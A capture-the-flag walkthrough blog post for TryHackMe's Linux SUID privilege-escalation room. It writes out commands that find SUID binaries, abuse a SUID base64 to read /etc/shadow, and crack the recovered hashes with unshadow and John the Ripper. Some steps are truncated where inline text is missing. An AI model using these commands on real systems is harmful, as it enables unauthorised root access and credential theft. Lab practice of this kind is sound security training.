TryHackMe - Linux Privilege Escalation: SUID
This article discusses the solution for TryHackMe's Linux Privilege Escalation SUID task so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation SUID Solution
Which user shares the name of a great comic book writer?
What is the password of user2?
find / -type f -perm -04000 -ls 2>/dev/nullto list files that have SUID or SGID bits set.
Go to https://gtfobins.github.io/#+suid to get list of appliations exploitable when SUID bit is set.
Can see that base64 is exploitable and we can escalate privileges using SUID.
Using the guide that gtfobins gave us we execute the following:
LFILE=/etc/shadow base64 "$LFILE" | base64 --decode
Create a local file
shadow.txtand copy the content from the target machine.
Unshadow the files:
unshadow passwd.txt shadow.txt > passwords.txt
Run john the ripper on
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
What is the content of the flag3.txt file?
Let's first check the home directory for the
Let's run the command agin provided by GTFO.
base64 "$LFILE" | base64 --decode
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarilyBuy Me A Coffeeif you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)